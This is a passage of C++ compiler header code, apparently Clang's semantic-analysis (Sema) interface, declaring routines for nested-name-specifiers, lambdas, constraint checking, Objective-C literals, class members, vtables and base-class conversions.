bool ActOnCXXGlobalScopeSpecifier(SourceLocation CCLoc, CXXScopeSpec &SS);
/// The parser has parsed a '__super' nested-name-specifier.
///
/// \param SuperLoc The location of the '__super' keyword.
///
/// \param ColonColonLoc The location of the '::'.
///
/// \param SS The nested-name-specifier, which will be updated in-place
/// to reflect the parsed nested-name-specifier.
///
/// \returns true if an error occurred, false otherwise.
bool ActOnSuperScopeSpecifier(SourceLocation SuperLoc,
SourceLocation ColonColonLoc, CXXScopeSpec &SS);
bool isAcceptableNestedNameSpecifier(const NamedDecl *SD,
bool *CanCorrect = nullptr);
NamedDecl *FindFirstQualifierInScope(Scope *S, NestedNameSpecifier *NNS);
/// Keeps information about an identifier in a nested-name-spec.
///
struct NestedNameSpecInfo {
/// The type of the object, if we're parsing nested-name-specifier in
/// a member access expression.
ParsedType ObjectType;
/// The identifier preceding the '::'.
IdentifierInfo *Identifier;
/// The location of the identifier.
SourceLocation IdentifierLoc;
/// The location of the '::'.
SourceLocation CCLoc;
/// Creates info object for the most typical case.
NestedNameSpecInfo(IdentifierInfo *II, SourceLocation IdLoc,
SourceLocation ColonColonLoc, ParsedType ObjectType = ParsedType())
: ObjectType(ObjectType), Identifier(II), IdentifierLoc(IdLoc),
CCLoc(ColonColonLoc) {
}
NestedNameSpecInfo(IdentifierInfo *II, SourceLocation IdLoc,
SourceLocation ColonColonLoc, QualType ObjectType)
: ObjectType(ParsedType::make(ObjectType)), Identifier(II),
IdentifierLoc(IdLoc), CCLoc(ColonColonLoc) {
}
};
bool isNonTypeNestedNameSpecifier(Scope *S, CXXScopeSpec &SS,
NestedNameSpecInfo &IdInfo);
bool BuildCXXNestedNameSpecifier(Scope *S,
NestedNameSpecInfo &IdInfo,
bool EnteringContext,
CXXScopeSpec &SS,
NamedDecl *ScopeLookupResult,
bool ErrorRecoveryLookup,
bool *IsCorrectedToColon = nullptr,
bool OnlyNamespace = false);
/// The parser has parsed a nested-name-specifier 'identifier::'.
///
/// \param S The scope in which this nested-name-specifier occurs.
///
/// \param IdInfo Parser information about an identifier in the
/// nested-name-spec.
///
/// \param EnteringContext Whether we're entering the context nominated by
/// this nested-name-specifier.
///
/// \param SS The nested-name-specifier, which is both an input
/// parameter (the nested-name-specifier before this type) and an
/// output parameter (containing the full nested-name-specifier,
/// including this new type).
///
/// \param ErrorRecoveryLookup If true, then this method is called to improve
/// error recovery. In this case do not emit error message.
///
/// \param IsCorrectedToColon If not null, suggestions to replace '::' -> ':'
/// are allowed. The bool value pointed by this parameter is set to 'true'
/// if the identifier is treated as if it was followed by ':', not '::'.
///
/// \param OnlyNamespace If true, only considers namespaces in lookup.
///
/// \returns true if an error occurred, false otherwise.
bool ActOnCXXNestedNameSpecifier(Scope *S,
NestedNameSpecInfo &IdInfo,
bool EnteringContext,
CXXScopeSpec &SS,
bool ErrorRecoveryLookup = false,
bool *IsCorrectedToColon = nullptr,
bool OnlyNamespace = false);
ExprResult ActOnDecltypeExpression(Expr *E);
bool ActOnCXXNestedNameSpecifierDecltype(CXXScopeSpec &SS,
const DeclSpec &DS,
SourceLocation ColonColonLoc);
bool IsInvalidUnlessNestedName(Scope *S, CXXScopeSpec &SS,
NestedNameSpecInfo &IdInfo,
bool EnteringContext);
/// The parser has parsed a nested-name-specifier
/// 'template[opt] template-name < template-args >::'.
///
/// \param S The scope in which this nested-name-specifier occurs.
///
/// \param SS The nested-name-specifier, which is both an input
/// parameter (the nested-name-specifier before this type) and an
/// output parameter (containing the full nested-name-specifier,
/// including this new type).
///
/// \param TemplateKWLoc the location of the 'template' keyword, if any.
/// \param TemplateName the template name.
/// \param TemplateNameLoc The location of the template name.
/// \param LAngleLoc The location of the opening angle bracket ('<').
/// \param TemplateArgs The template arguments.
/// \param RAngleLoc The location of the closing angle bracket ('>').
/// \param CCLoc The location of the '::'.
///
/// \param EnteringContext Whether we're entering the context of the
/// nested-name-specifier.
///
///
/// \returns true if an error occurred, false otherwise.
bool ActOnCXXNestedNameSpecifier(Scope *S,
CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
TemplateTy TemplateName,
SourceLocation TemplateNameLoc,
SourceLocation LAngleLoc,
ASTTemplateArgsPtr TemplateArgs,
SourceLocation RAngleLoc,
SourceLocation CCLoc,
bool EnteringContext);
/// Given a C++ nested-name-specifier, produce an annotation value
/// that the parser can use later to reconstruct the given
/// nested-name-specifier.
///
/// \param SS A nested-name-specifier.
///
/// \returns A pointer containing all of the information in the
/// nested-name-specifier \p SS.
void *SaveNestedNameSpecifierAnnotation(CXXScopeSpec &SS);
/// Given an annotation pointer for a nested-name-specifier, restore
/// the nested-name-specifier structure.
///
/// \param Annotation The annotation pointer, produced by
/// \c SaveNestedNameSpecifierAnnotation().
///
/// \param AnnotationRange The source range corresponding to the annotation.
///
/// \param SS The nested-name-specifier that will be updated with the contents
/// of the annotation pointer.
void RestoreNestedNameSpecifierAnnotation(void *Annotation,
SourceRange AnnotationRange,
CXXScopeSpec &SS);
bool ShouldEnterDeclaratorScope(Scope *S, const CXXScopeSpec &SS);
/// ActOnCXXEnterDeclaratorScope - Called when a C++ scope specifier (global
/// scope or nested-name-specifier) is parsed, part of a declarator-id.
/// After this method is called, according to [C++ 3.4.3p3], names should be
/// looked up in the declarator-id's scope, until the declarator is parsed and
/// ActOnCXXExitDeclaratorScope is called.
/// The 'SS' should be a non-empty valid CXXScopeSpec.
bool ActOnCXXEnterDeclaratorScope(Scope *S, CXXScopeSpec &SS);
/// ActOnCXXExitDeclaratorScope - Called when a declarator that previously
/// invoked ActOnCXXEnterDeclaratorScope(), is finished. 'SS' is the same
/// CXXScopeSpec that was passed to ActOnCXXEnterDeclaratorScope as well.
/// Used to indicate that names should revert to being looked up in the
/// defining scope.
void ActOnCXXExitDeclaratorScope(Scope *S, const CXXScopeSpec &SS);
/// ActOnCXXEnterDeclInitializer - Invoked when we are about to parse an
/// initializer for the declaration 'Dcl'.
/// After this method is called, according to [C++ 3.4.1p13], if 'Dcl' is a
/// static data member of class X, names should be looked up in the scope of
/// class X.
void ActOnCXXEnterDeclInitializer(Scope *S, Decl *Dcl);
/// ActOnCXXExitDeclInitializer - Invoked after we are finished parsing an
/// initializer for the declaration 'Dcl'.
void ActOnCXXExitDeclInitializer(Scope *S, Decl *Dcl);
/// Create a new lambda closure type.
CXXRecordDecl *createLambdaClosureType(SourceRange IntroducerRange,
TypeSourceInfo *Info,
bool KnownDependent,
LambdaCaptureDefault CaptureDefault);
/// Start the definition of a lambda expression.
CXXMethodDecl *startLambdaDefinition(CXXRecordDecl *Class,
SourceRange IntroducerRange,
TypeSourceInfo *MethodType,
SourceLocation EndLoc,
ArrayRef<ParmVarDecl *> Params,
ConstexprSpecKind ConstexprKind,
Expr *TrailingRequiresClause);
/// Number lambda for linkage purposes if necessary.
void handleLambdaNumbering(
CXXRecordDecl *Class, CXXMethodDecl *Method,
Optional<std::tuple<unsigned, bool, Decl *>> Mangling = None);
/// Endow the lambda scope info with the relevant properties.
void buildLambdaScope(sema::LambdaScopeInfo *LSI,
CXXMethodDecl *CallOperator,
SourceRange IntroducerRange,
LambdaCaptureDefault CaptureDefault,
SourceLocation CaptureDefaultLoc,
bool ExplicitParams,
bool ExplicitResultType,
bool Mutable);
/// Perform initialization analysis of the init-capture and perform
/// any implicit conversions such as an lvalue-to-rvalue conversion if
/// not being used to initialize a reference.
ParsedType actOnLambdaInitCaptureInitialization(
SourceLocation Loc, bool ByRef, SourceLocation EllipsisLoc,
IdentifierInfo *Id, LambdaCaptureInitKind InitKind, Expr *&Init) {
return ParsedType::make(buildLambdaInitCaptureInitialization(
Loc, ByRef, EllipsisLoc, None, Id,
InitKind != LambdaCaptureInitKind::CopyInit, Init));
}
QualType buildLambdaInitCaptureInitialization(
SourceLocation Loc, bool ByRef, SourceLocation EllipsisLoc,
Optional<unsigned> NumExpansions, IdentifierInfo *Id, bool DirectInit,
Expr *&Init);
/// Create a dummy variable within the declcontext of the lambda's
/// call operator, for name lookup purposes for a lambda init capture.
///
/// CodeGen handles emission of lambda captures, ignoring these dummy
/// variables appropriately.
VarDecl *createLambdaInitCaptureVarDecl(SourceLocation Loc,
QualType InitCaptureType,
SourceLocation EllipsisLoc,
IdentifierInfo *Id,
unsigned InitStyle, Expr *Init);
/// Add an init-capture to a lambda scope.
void addInitCapture(sema::LambdaScopeInfo *LSI, VarDecl *Var);
/// Note that we have finished the explicit captures for the
/// given lambda.
void finishLambdaExplicitCaptures(sema::LambdaScopeInfo *LSI);
/// \brief This is called after parsing the explicit template parameter list
/// on a lambda (if it exists) in C++2a.
void ActOnLambdaExplicitTemplateParameterList(SourceLocation LAngleLoc,
ArrayRef<NamedDecl *> TParams,
SourceLocation RAngleLoc);
/// Introduce the lambda parameters into scope.
void addLambdaParameters(
ArrayRef<LambdaIntroducer::LambdaCapture> Captures,
CXXMethodDecl *CallOperator, Scope *CurScope);
/// Deduce a block or lambda's return type based on the return
/// statements present in the body.
void deduceClosureReturnType(sema::CapturingScopeInfo &CSI);
/// ActOnStartOfLambdaDefinition - This is called just before we start
/// parsing the body of a lambda; it analyzes the explicit captures and
/// arguments, and sets up various data-structures for the body of the
/// lambda.
void ActOnStartOfLambdaDefinition(LambdaIntroducer &Intro,
Declarator &ParamInfo, Scope *CurScope);
/// ActOnLambdaError - If there is an error parsing a lambda, this callback
/// is invoked to pop the information about the lambda.
void ActOnLambdaError(SourceLocation StartLoc, Scope *CurScope,
bool IsInstantiation = false);
/// ActOnLambdaExpr - This is called when the body of a lambda expression
/// was successfully completed.
ExprResult ActOnLambdaExpr(SourceLocation StartLoc, Stmt *Body,
Scope *CurScope);
/// Does copying/destroying the captured variable have side effects?
bool CaptureHasSideEffects(const sema::Capture &From);
/// Diagnose if an explicit lambda capture is unused. Returns true if a
/// diagnostic is emitted.
bool DiagnoseUnusedLambdaCapture(SourceRange CaptureRange,
const sema::Capture &From);
/// Build a FieldDecl suitable to hold the given capture.
FieldDecl *BuildCaptureField(RecordDecl *RD, const sema::Capture &Capture);
/// Initialize the given capture with a suitable expression.
ExprResult BuildCaptureInit(const sema::Capture &Capture,
SourceLocation ImplicitCaptureLoc,
bool IsOpenMPMapping = false);
/// Complete a lambda-expression having processed and attached the
/// lambda body.
ExprResult BuildLambdaExpr(SourceLocation StartLoc, SourceLocation EndLoc,
sema::LambdaScopeInfo *LSI);
/// Get the return type to use for a lambda's conversion function(s) to
/// function pointer type, given the type of the call operator.
QualType
getLambdaConversionFunctionResultType(const FunctionProtoType *CallOpType);
/// Define the "body" of the conversion from a lambda object to a
/// function pointer.
///
/// This routine doesn't actually define a sensible body; rather, it fills
/// in the initialization expression needed to copy the lambda object into
/// the block, and IR generation actually generates the real body of the
/// block pointer conversion.
void DefineImplicitLambdaToFunctionPointerConversion(
SourceLocation CurrentLoc, CXXConversionDecl *Conv);
/// Define the "body" of the conversion from a lambda object to a
/// block pointer.
///
/// This routine doesn't actually define a sensible body; rather, it fills
/// in the initialization expression needed to copy the lambda object into
/// the block, and IR generation actually generates the real body of the
/// block pointer conversion.
void DefineImplicitLambdaToBlockPointerConversion(SourceLocation CurrentLoc,
CXXConversionDecl *Conv);
ExprResult BuildBlockForLambdaConversion(SourceLocation CurrentLocation,
SourceLocation ConvLocation,
CXXConversionDecl *Conv,
Expr *Src);
/// Check whether the given expression is a valid constraint expression.
/// A diagnostic is emitted if it is not, false is returned, and
/// PossibleNonPrimary will be set to true if the failure might be due to a
/// non-primary expression being used as an atomic constraint.
bool CheckConstraintExpression(Expr *CE, Token NextToken = Token(),
bool *PossibleNonPrimary = nullptr,
bool IsTrailingRequiresClause = false);
/// Check whether the given type-dependent expression will be the name of a
/// function or another callable function-like entity (e.g. a function
// template or overload set) for any substitution.
bool IsDependentFunctionNameExpr(Expr *E);
private:
/// Caches pairs of template-like decls whose associated constraints were
/// checked for subsumption and whether or not the first's constraints did in
/// fact subsume the second's.
llvm::DenseMap<std::pair<NamedDecl *, NamedDecl *>, bool> SubsumptionCache;
/// Caches the normalized associated constraints of declarations (concepts or
/// constrained declarations). If an error occurred while normalizing the
/// associated constraints of the template or concept, nullptr will be cached
/// here.
llvm::DenseMap<NamedDecl *, NormalizedConstraint *>
NormalizationCache;
llvm::ContextualFoldingSet<ConstraintSatisfaction, const ASTContext &>
SatisfactionCache;
public:
const NormalizedConstraint *
getNormalizedAssociatedConstraints(
NamedDecl *ConstrainedDecl, ArrayRef<const Expr *> AssociatedConstraints);
/// \brief Check whether the given declaration's associated constraints are
/// at least as constrained than another declaration's according to the
/// partial ordering of constraints.
///
/// \param Result If no error occurred, receives the result of true if D1 is
/// at least constrained than D2, and false otherwise.
///
/// \returns true if an error occurred, false otherwise.
bool IsAtLeastAsConstrained(NamedDecl *D1, ArrayRef<const Expr *> AC1,
NamedDecl *D2, ArrayRef<const Expr *> AC2,
bool &Result);
/// If D1 was not at least as constrained as D2, but would've been if a pair
/// of atomic constraints involved had been declared in a concept and not
/// repeated in two separate places in code.
/// \returns true if such a diagnostic was emitted, false otherwise.
bool MaybeEmitAmbiguousAtomicConstraintsDiagnostic(NamedDecl *D1,
ArrayRef<const Expr *> AC1, NamedDecl *D2, ArrayRef<const Expr *> AC2);
/// \brief Check whether the given list of constraint expressions are
/// satisfied (as if in a 'conjunction') given template arguments.
/// \param Template the template-like entity that triggered the constraints
/// check (either a concept or a constrained entity).
/// \param ConstraintExprs a list of constraint expressions, treated as if
/// they were 'AND'ed together.
/// \param TemplateArgs the list of template arguments to substitute into the
/// constraint expression.
/// \param TemplateIDRange The source range of the template id that
/// caused the constraints check.
/// \param Satisfaction if true is returned, will contain details of the
/// satisfaction, with enough information to diagnose an unsatisfied
/// expression.
/// \returns true if an error occurred and satisfaction could not be checked,
/// false otherwise.
bool CheckConstraintSatisfaction(
const NamedDecl *Template, ArrayRef<const Expr *> ConstraintExprs,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange TemplateIDRange, ConstraintSatisfaction &Satisfaction);
/// \brief Check whether the given non-dependent constraint expression is
/// satisfied. Returns false and updates Satisfaction with the satisfaction
/// verdict if successful, emits a diagnostic and returns true if an error
/// occured and satisfaction could not be determined.
///
/// \returns true if an error occurred, false otherwise.
bool CheckConstraintSatisfaction(const Expr *ConstraintExpr,
ConstraintSatisfaction &Satisfaction);
/// Check whether the given function decl's trailing requires clause is
/// satisfied, if any. Returns false and updates Satisfaction with the
/// satisfaction verdict if successful, emits a diagnostic and returns true if
/// an error occured and satisfaction could not be determined.
///
/// \returns true if an error occurred, false otherwise.
bool CheckFunctionConstraints(const FunctionDecl *FD,
ConstraintSatisfaction &Satisfaction,
SourceLocation UsageLoc = SourceLocation());
/// \brief Ensure that the given template arguments satisfy the constraints
/// associated with the given template, emitting a diagnostic if they do not.
///
/// \param Template The template to which the template arguments are being
/// provided.
///
/// \param TemplateArgs The converted, canonicalized template arguments.
///
/// \param TemplateIDRange The source range of the template id that
/// caused the constraints check.
///
/// \returns true if the constrains are not satisfied or could not be checked
/// for satisfaction, false if the constraints are satisfied.
bool EnsureTemplateArgumentListConstraints(TemplateDecl *Template,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange TemplateIDRange);
/// \brief Emit diagnostics explaining why a constraint expression was deemed
/// unsatisfied.
/// \param First whether this is the first time an unsatisfied constraint is
/// diagnosed for this error.
void
DiagnoseUnsatisfiedConstraint(const ConstraintSatisfaction &Satisfaction,
bool First = true);
/// \brief Emit diagnostics explaining why a constraint expression was deemed
/// unsatisfied.
void
DiagnoseUnsatisfiedConstraint(const ASTConstraintSatisfaction &Satisfaction,
bool First = true);
/// \brief Emit diagnostics explaining why a constraint expression was deemed
/// unsatisfied because it was ill-formed.
void DiagnoseUnsatisfiedIllFormedConstraint(SourceLocation DiagnosticLocation,
StringRef Diagnostic);
void DiagnoseRedeclarationConstraintMismatch(SourceLocation Old,
SourceLocation New);
// ParseObjCStringLiteral - Parse Objective-C string literals.
ExprResult ParseObjCStringLiteral(SourceLocation *AtLocs,
ArrayRef<Expr *> Strings);
ExprResult BuildObjCStringLiteral(SourceLocation AtLoc, StringLiteral *S);
/// BuildObjCNumericLiteral - builds an ObjCBoxedExpr AST node for the
/// numeric literal expression. Type of the expression will be "NSNumber *"
/// or "id" if NSNumber is unavailable.
ExprResult BuildObjCNumericLiteral(SourceLocation AtLoc, Expr *Number);
ExprResult ActOnObjCBoolLiteral(SourceLocation AtLoc, SourceLocation ValueLoc,
bool Value);
ExprResult BuildObjCArrayLiteral(SourceRange SR, MultiExprArg Elements);
/// BuildObjCBoxedExpr - builds an ObjCBoxedExpr AST node for the
/// '@' prefixed parenthesized expression. The type of the expression will
/// either be "NSNumber *", "NSString *" or "NSValue *" depending on the type
/// of ValueType, which is allowed to be a built-in numeric type, "char *",
/// "const char *" or C structure with attribute 'objc_boxable'.
ExprResult BuildObjCBoxedExpr(SourceRange SR, Expr *ValueExpr);
ExprResult BuildObjCSubscriptExpression(SourceLocation RB, Expr *BaseExpr,
Expr *IndexExpr,
ObjCMethodDecl *getterMethod,
ObjCMethodDecl *setterMethod);
ExprResult BuildObjCDictionaryLiteral(SourceRange SR,
MutableArrayRef<ObjCDictionaryElement> Elements);
ExprResult BuildObjCEncodeExpression(SourceLocation AtLoc,
TypeSourceInfo *EncodedTypeInfo,
SourceLocation RParenLoc);
ExprResult BuildCXXMemberCallExpr(Expr *Exp, NamedDecl *FoundDecl,
CXXConversionDecl *Method,
bool HadMultipleCandidates);
ExprResult ParseObjCEncodeExpression(SourceLocation AtLoc,
SourceLocation EncodeLoc,
SourceLocation LParenLoc,
ParsedType Ty,
SourceLocation RParenLoc);
/// ParseObjCSelectorExpression - Build selector expression for \@selector
ExprResult ParseObjCSelectorExpression(Selector Sel,
SourceLocation AtLoc,
SourceLocation SelLoc,
SourceLocation LParenLoc,
SourceLocation RParenLoc,
bool WarnMultipleSelectors);
/// ParseObjCProtocolExpression - Build protocol expression for \@protocol
ExprResult ParseObjCProtocolExpression(IdentifierInfo * ProtocolName,
SourceLocation AtLoc,
SourceLocation ProtoLoc,
SourceLocation LParenLoc,
SourceLocation ProtoIdLoc,
SourceLocation RParenLoc);
//===--------------------------------------------------------------------===//
// C++ Declarations
//
Decl *ActOnStartLinkageSpecification(Scope *S,
SourceLocation ExternLoc,
Expr *LangStr,
SourceLocation LBraceLoc);
Decl *ActOnFinishLinkageSpecification(Scope *S,
Decl *LinkageSpec,
SourceLocation RBraceLoc);
//===--------------------------------------------------------------------===//
// C++ Classes
//
CXXRecordDecl *getCurrentClass(Scope *S, const CXXScopeSpec *SS);
bool isCurrentClassName(const IdentifierInfo &II, Scope *S,
const CXXScopeSpec *SS = nullptr);
bool isCurrentClassNameTypo(IdentifierInfo *&II, const CXXScopeSpec *SS);
bool ActOnAccessSpecifier(AccessSpecifier Access, SourceLocation ASLoc,
SourceLocation ColonLoc,
const ParsedAttributesView &Attrs);
NamedDecl *ActOnCXXMemberDeclarator(Scope *S, AccessSpecifier AS,
Declarator &D,
MultiTemplateParamsArg TemplateParameterLists,
Expr *BitfieldWidth, const VirtSpecifiers &VS,
InClassInitStyle InitStyle);
void ActOnStartCXXInClassMemberInitializer();
void ActOnFinishCXXInClassMemberInitializer(Decl *VarDecl,
SourceLocation EqualLoc,
Expr *Init);
MemInitResult ActOnMemInitializer(Decl *ConstructorD,
Scope *S,
CXXScopeSpec &SS,
IdentifierInfo *MemberOrBase,
ParsedType TemplateTypeTy,
const DeclSpec &DS,
SourceLocation IdLoc,
SourceLocation LParenLoc,
ArrayRef<Expr *> Args,
SourceLocation RParenLoc,
SourceLocation EllipsisLoc);
MemInitResult ActOnMemInitializer(Decl *ConstructorD,
Scope *S,
CXXScopeSpec &SS,
IdentifierInfo *MemberOrBase,
ParsedType TemplateTypeTy,
const DeclSpec &DS,
SourceLocation IdLoc,
Expr *InitList,
SourceLocation EllipsisLoc);
MemInitResult BuildMemInitializer(Decl *ConstructorD,
Scope *S,
CXXScopeSpec &SS,
IdentifierInfo *MemberOrBase,
ParsedType TemplateTypeTy,
const DeclSpec &DS,
SourceLocation IdLoc,
Expr *Init,
SourceLocation EllipsisLoc);
MemInitResult BuildMemberInitializer(ValueDecl *Member,
Expr *Init,
SourceLocation IdLoc);
MemInitResult BuildBaseInitializer(QualType BaseType,
TypeSourceInfo *BaseTInfo,
Expr *Init,
CXXRecordDecl *ClassDecl,
SourceLocation EllipsisLoc);
MemInitResult BuildDelegatingInitializer(TypeSourceInfo *TInfo,
Expr *Init,
CXXRecordDecl *ClassDecl);
bool SetDelegatingInitializer(CXXConstructorDecl *Constructor,
CXXCtorInitializer *Initializer);
bool SetCtorInitializers(CXXConstructorDecl *Constructor, bool AnyErrors,
ArrayRef<CXXCtorInitializer *> Initializers = None);
void SetIvarInitializers(ObjCImplementationDecl *ObjCImplementation);
/// MarkBaseAndMemberDestructorsReferenced - Given a record decl,
/// mark all the non-trivial destructors of its members and bases as
/// referenced.
void MarkBaseAndMemberDestructorsReferenced(SourceLocation Loc,
CXXRecordDecl *Record);
/// Mark destructors of virtual bases of this class referenced. In the Itanium
/// C++ ABI, this is done when emitting a destructor for any non-abstract
/// class. In the Microsoft C++ ABI, this is done any time a class's
/// destructor is referenced.
void MarkVirtualBaseDestructorsReferenced(
SourceLocation Location, CXXRecordDecl *ClassDecl,
llvm::SmallPtrSetImpl<const RecordType *> *DirectVirtualBases = nullptr);
/// Do semantic checks to allow the complete destructor variant to be emitted
/// when the destructor is defined in another translation unit. In the Itanium
/// C++ ABI, destructor variants are emitted together. In the MS C++ ABI, they
/// can be emitted in separate TUs. To emit the complete variant, run a subset
/// of the checks performed when emitting a regular destructor.
void CheckCompleteDestructorVariant(SourceLocation CurrentLocation,
CXXDestructorDecl *Dtor);
/// The list of classes whose vtables have been used within
/// this translation unit, and the source locations at which the
/// first use occurred.
typedef std::pair<CXXRecordDecl*, SourceLocation> VTableUse;
/// The list of vtables that are required but have not yet been
/// materialized.
SmallVector<VTableUse, 16> VTableUses;
/// The set of classes whose vtables have been used within
/// this translation unit, and a bit that will be true if the vtable is
/// required to be emitted (otherwise, it should be emitted only if needed
/// by code generation).
llvm::DenseMap<CXXRecordDecl *, bool> VTablesUsed;
/// Load any externally-stored vtable uses.
void LoadExternalVTableUses();
/// Note that the vtable for the given class was used at the
/// given location.
void MarkVTableUsed(SourceLocation Loc, CXXRecordDecl *Class,
bool DefinitionRequired = false);
/// Mark the exception specifications of all virtual member functions
/// in the given class as needed.
void MarkVirtualMemberExceptionSpecsNeeded(SourceLocation Loc,
const CXXRecordDecl *RD);
/// MarkVirtualMembersReferenced - Will mark all members of the given
/// CXXRecordDecl referenced.
void MarkVirtualMembersReferenced(SourceLocation Loc, const CXXRecordDecl *RD,
bool ConstexprOnly = false);
/// Define all of the vtables that have been used in this
/// translation unit and reference any virtual members used by those
/// vtables.
///
/// \returns true if any work was done, false otherwise.
bool DefineUsedVTables();
void AddImplicitlyDeclaredMembersToClass(CXXRecordDecl *ClassDecl);
void ActOnMemInitializers(Decl *ConstructorDecl,
SourceLocation ColonLoc,
ArrayRef<CXXCtorInitializer*> MemInits,
bool AnyErrors);
/// Check class-level dllimport/dllexport attribute. The caller must
/// ensure that referenceDLLExportedClassMethods is called some point later
/// when all outer classes of Class are complete.
void checkClassLevelDLLAttribute(CXXRecordDecl *Class);
void checkClassLevelCodeSegAttribute(CXXRecordDecl *Class);
void referenceDLLExportedClassMethods();
void propagateDLLAttrToBaseClassTemplate(
CXXRecordDecl *Class, Attr *ClassAttr,
ClassTemplateSpecializationDecl *BaseTemplateSpec,
SourceLocation BaseLoc);
/// Add gsl::Pointer attribute to std::container::iterator
/// \param ND The declaration that introduces the name
/// std::container::iterator. \param UnderlyingRecord The record named by ND.
void inferGslPointerAttribute(NamedDecl *ND, CXXRecordDecl *UnderlyingRecord);
/// Add [[gsl::Owner]] and [[gsl::Pointer]] attributes for std:: types.
void inferGslOwnerPointerAttribute(CXXRecordDecl *Record);
/// Add [[gsl::Pointer]] attributes for std:: types.
void inferGslPointerAttribute(TypedefNameDecl *TD);
void CheckCompletedCXXClass(Scope *S, CXXRecordDecl *Record);
/// Check that the C++ class annoated with "trivial_abi" satisfies all the
/// conditions that are needed for the attribute to have an effect.
void checkIllFormedTrivialABIStruct(CXXRecordDecl &RD);
void ActOnFinishCXXMemberSpecification(Scope *S, SourceLocation RLoc,
Decl *TagDecl, SourceLocation LBrac,
SourceLocation RBrac,
const ParsedAttributesView &AttrList);
void ActOnFinishCXXMemberDecls();
void ActOnFinishCXXNonNestedClass();
void ActOnReenterCXXMethodParameter(Scope *S, ParmVarDecl *Param);
unsigned ActOnReenterTemplateScope(Scope *S, Decl *Template);
void ActOnStartDelayedMemberDeclarations(Scope *S, Decl *Record);
void ActOnStartDelayedCXXMethodDeclaration(Scope *S, Decl *Method);
void ActOnDelayedCXXMethodParameter(Scope *S, Decl *Param);
void ActOnFinishDelayedMemberDeclarations(Scope *S, Decl *Record);
void ActOnFinishDelayedCXXMethodDeclaration(Scope *S, Decl *Method);
void ActOnFinishDelayedMemberInitializers(Decl *Record);
void MarkAsLateParsedTemplate(FunctionDecl *FD, Decl *FnD,
CachedTokens &Toks);
void UnmarkAsLateParsedTemplate(FunctionDecl *FD);
bool IsInsideALocalClassWithinATemplateFunction();
Decl *ActOnStaticAssertDeclaration(SourceLocation StaticAssertLoc,
Expr *AssertExpr,
Expr *AssertMessageExpr,
SourceLocation RParenLoc);
Decl *BuildStaticAssertDeclaration(SourceLocation StaticAssertLoc,
Expr *AssertExpr,
StringLiteral *AssertMessageExpr,
SourceLocation RParenLoc,
bool Failed);
FriendDecl *CheckFriendTypeDecl(SourceLocation LocStart,
SourceLocation FriendLoc,
TypeSourceInfo *TSInfo);
Decl *ActOnFriendTypeDecl(Scope *S, const DeclSpec &DS,
MultiTemplateParamsArg TemplateParams);
NamedDecl *ActOnFriendFunctionDecl(Scope *S, Declarator &D,
MultiTemplateParamsArg TemplateParams);
QualType CheckConstructorDeclarator(Declarator &D, QualType R,
StorageClass& SC);
void CheckConstructor(CXXConstructorDecl *Constructor);
QualType CheckDestructorDeclarator(Declarator &D, QualType R,
StorageClass& SC);
bool CheckDestructor(CXXDestructorDecl *Destructor);
void CheckConversionDeclarator(Declarator &D, QualType &R,
StorageClass& SC);
Decl *ActOnConversionDeclarator(CXXConversionDecl *Conversion);
void CheckDeductionGuideDeclarator(Declarator &D, QualType &R,
StorageClass &SC);
void CheckDeductionGuideTemplate(FunctionTemplateDecl *TD);
void CheckExplicitlyDefaultedFunction(Scope *S, FunctionDecl *MD);
bool CheckExplicitlyDefaultedSpecialMember(CXXMethodDecl *MD,
CXXSpecialMember CSM);
void CheckDelayedMemberExceptionSpecs();
bool CheckExplicitlyDefaultedComparison(Scope *S, FunctionDecl *MD,
DefaultedComparisonKind DCK);
void DeclareImplicitEqualityComparison(CXXRecordDecl *RD,
FunctionDecl *Spaceship);
void DefineDefaultedComparison(SourceLocation Loc, FunctionDecl *FD,
DefaultedComparisonKind DCK);
//===--------------------------------------------------------------------===//
// C++ Derived Classes
//
/// ActOnBaseSpecifier - Parsed a base specifier
CXXBaseSpecifier *CheckBaseSpecifier(CXXRecordDecl *Class,
SourceRange SpecifierRange,
bool Virtual, AccessSpecifier Access,
TypeSourceInfo *TInfo,
SourceLocation EllipsisLoc);
BaseResult ActOnBaseSpecifier(Decl *classdecl,
SourceRange SpecifierRange,
ParsedAttributes &Attrs,
bool Virtual, AccessSpecifier Access,
ParsedType basetype,
SourceLocation BaseLoc,
SourceLocation EllipsisLoc);
bool AttachBaseSpecifiers(CXXRecordDecl *Class,
MutableArrayRef<CXXBaseSpecifier *> Bases);
void ActOnBaseSpecifiers(Decl *ClassDecl,
MutableArrayRef<CXXBaseSpecifier *> Bases);
bool IsDerivedFrom(SourceLocation Loc, QualType Derived, QualType Base);
bool IsDerivedFrom(SourceLocation Loc, QualType Derived, QualType Base,
CXXBasePaths &Paths);
// FIXME: I don't like this name.
void BuildBasePathArray(const CXXBasePaths &Paths, CXXCastPath &BasePath);
bool CheckDerivedToBaseConversion(QualType Derived, QualType Base,
SourceLocation Loc, SourceRange Range,
CXXCastPath *BasePath = nullptr,
bool IgnoreAccess = false);
bool CheckDerivedToBaseConversion(QualType Derived, QualType Base,
unsigned InaccessibleBaseID,
unsigned AmbigiousBaseConvID,
SourceLocation Loc, SourceRange Range,
DeclarationName Name,
CXXCastPath *BasePath,
bool IgnoreAccess = false);
std::string getAmbiguousPathsDisplayString(CXXBasePaths &Paths);
bool CheckOverridingFunctionAttributes(const CXXMethodDecl *New,
const CXXMethodDecl *Old);
/// CheckOverridingFunctionReturnType - Checks whether the return types are
/// covariant, according to C++ [class.virtual]p5.
bool CheckOverridingFunctionReturnType(const CXXMethodDecl *New,
const CXXMethodDecl *Old);
/// CheckOverridingFunctionExceptionSpec - Checks whether the exception
/// spec is a subset of base spec.
bool CheckOverridingFunctionExceptionSpec(const CXXMethodDecl *New,
const CXXMethodDecl *Old);
bool CheckPureMethod(CXXMethodDecl *Method, SourceRange InitRange);
/// CheckOverrideControl - Check C++11 override control semantics.
void CheckOverrideControl(NamedDecl *D);
/// DiagnoseAbsenceOfOverrideControl - Diagnose if 'override' keyword was
/// not used in the declaration of an overriding method.
void DiagnoseAbsenceOfOverrideControl(NamedDecl *D);
/// CheckForFunctionMarkedFinal - Checks whether a virtual member function
/// overrides a virtual member function marked 'final', according to
/// C++11 [class.virtual]p4.
bool CheckIfOverriddenFunctionIsMarkedFinal(const CXXMethodDecl *New,
const CXXMethodDecl *Old);
//===--------------------------------------------------------------------===//
// C++ Access Control
//
enum AccessResult {
AR_accessible,
AR_inaccessible,
AR_dependent,
AR_delayed
};
